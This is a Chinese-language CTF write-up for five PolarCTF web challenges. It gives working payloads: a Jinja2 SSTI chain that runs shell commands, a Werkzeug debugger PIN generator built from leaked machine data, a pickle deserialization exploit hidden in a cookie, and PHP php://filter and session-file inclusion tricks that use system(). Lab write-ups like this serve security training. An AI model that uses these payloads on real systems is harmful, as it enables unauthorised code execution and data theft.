polarctf-web(26-30)

SSTI

考察点

python ssti

解题

没有waf的ssti,用hackbar自带的payload即可

payload: {%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /flag').read()}}{%endif%}{%endfor%}

flask_pin

考察点

flask_pin的生成

解题

看报错有个?filename的接口可以读取文件内容,使用python脚本生成pin码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import hashlib
from itertools import chain
def mac(mac_str):
    mac_clean = mac_str.replace(':', '')  # 移除冒号:'0242ac021b37'
    full_decimal = int(mac_clean, 16)
    print(full_decimal)
    return str(full_decimal)
probably_public_bits = [
    'root', # /etc/passwd
    'flask.app', # modname默认
    'Flask', #getattr(app, "__name__", app.__class__.__name__)
    '/usr/local/lib/python3.5/site-packages/flask/app.py' # getattr(mod, "__file__", None) 报错中找
]

private_bits = [
    mac("02:42:ac:02:1b:45"),
    'c31eea55a29431535ff01de94bdcf5cfe8f27c7d36e400c851089da823602e1d65b554398f939a01152781c4dd2065bd'# /etc/machine-id  /proc/sys/kernel/random/boot_id 23或13
]


h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)

算出pin码,到console执行命令

unpickle

考察点

python 反序列化

解题

源码里序列化cookie中user的值

直接构造反序列化内容读取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import pickle
import base64

# 生成恶意Pickle对象,读取flag文件
class Exploit:
    def __reduce__(self):
        # 尝试多个flag路径,直到成功为止
        commands = "cat /flag"
        return (eval, ('__import__("os").popen("{}").read()'.format(commands),))

# 生成Payload
payload = pickle.dumps(Exploit())
payload_b64 = base64.b64encode(payload).decode()
print("恶意Cookie (user):", payload_b64)

签到

考察点

签到题,post

解题

post发送 key=ilovejljcxy&qiandao=1即可

session文件包含

考察点

session文件的文件包含

解题

先用php://filter/convert.base64-encode/resource=action.php读取action.php的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
	$_SESSION["username"] = $name;
}
include($_GET['file']);
?>
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<a href=action.php?file=1.txt>my dairy</a>
<a href=action.php?file=2.txt>my booklist</a>
</body>
</html>

猜测session文件在/tmp目录下, 文件格式为sess_+sessionid

返回内容 username|s:3:"sss";,在username构造php代码

?file=/tmp/sess_cgbsamn1g0si2dcfm2hcge3j21&1=system('cat /flaggggg');读取成功